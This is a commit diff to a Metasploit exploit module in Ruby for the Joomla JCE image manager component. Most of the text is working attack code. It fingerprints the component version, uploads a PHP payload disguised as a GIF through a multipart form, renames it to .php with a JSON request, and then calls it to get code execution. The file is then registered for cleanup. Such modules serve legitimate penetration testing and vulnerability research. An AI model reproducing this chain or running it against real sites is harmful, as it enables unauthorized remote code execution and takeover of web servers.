many code adjustments

bug/bundler_fix
heyder 2013-03-22 23:07:08 -03:00
parent b5c65ad51b
commit 5bee1471df
1 changed files with 32 additions and 36 deletions

View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
@ -56,17 +57,16 @@ class Metasploit3 < Msf::Exploit::Remote
def get_version
# check imgmanager version
@uri_base = normalize_uri(datastore['URI'], 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager')
uri = ''
uri << @uri_base
@uri_base = normalize_uri(datastore['URI']) + 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager'
uri = @uri_base
print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi(
{
'uri' => uri,
'method' => 'GET',
'version' => '1.1',
'version' => '1.1'
}, 25)
})
if (res and res.code == 200)
res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
@ -95,39 +95,28 @@ class Metasploit3 < Msf::Exploit::Remote
@script_name = rand_text_alpha_lower(6)
boundary = '-' * 27 + rand_text_numeric(11)
uri = ''
uri << @uri_base
uri = @uri_base
uri << '&method=form'
# POST data
data = "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n"
data << "/\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n"
data << "Content-Type: application/octet-stream\r\n\r\n"
data << "\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n"
data << "0\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@script_name}.gif\"\r\n"
data << "Content-Type: image/gif\r\n\r\n"
data << "#{cmd_php}\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"upload-name\"\r\n\r\n"
data << "#{@script_name}\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"action\"\r\n\r\n"
data << "upload\r\n"
data << "--#{boundary}--\r\n\r\n"
post_data = Rex::MIME::Message.new
post_data.bound = boundary
post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@script_name}.gif\"")
post_data.add_part("#{@script_name}", nil, nil, "form-data; name=\"upload-name\"")
post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'version' => '1.1',
'data' => data,
'ctype' => 'multipart/form-data; boundary=' + boundary
}, 25)
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if (res and res.code = 200 )
return :access_denied if (res.body =~ /RESTRICTED/i)
@ -143,8 +132,8 @@ class Metasploit3 < Msf::Exploit::Remote
def renamed?
# Rename the file from .gif to .php
uri = ''
uri << @uri_base
# uri = ''
uri = @uri_base
uri << '&version=1576&cid=20'
data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@script_name}.gif\",\"#{@script_name}.php\"]}"
@ -162,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'X-Request' => 'JSON'
}
}, 25)
})
if (res and res.code == 200 )
print_good("Renamed #{@script_name}.gif to #{@script_name}.php")
return true
@ -177,9 +166,15 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Calling payload: #{@script_name}.php")
uri = normalize_uri(datastore['URI'])
uri << directory + @script_name + ".php"
res = send_request_raw({
'uri' => uri
}, 25)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'version' => '1.1'
})
end
def on_new_session
# on_new_session will force stdapi to load (for Linux meterpreter)
end
def exploit
@ -188,6 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
if upload_gif == :success
if renamed?
call_payload
register_files_for_cleanup(@script_name)
end
end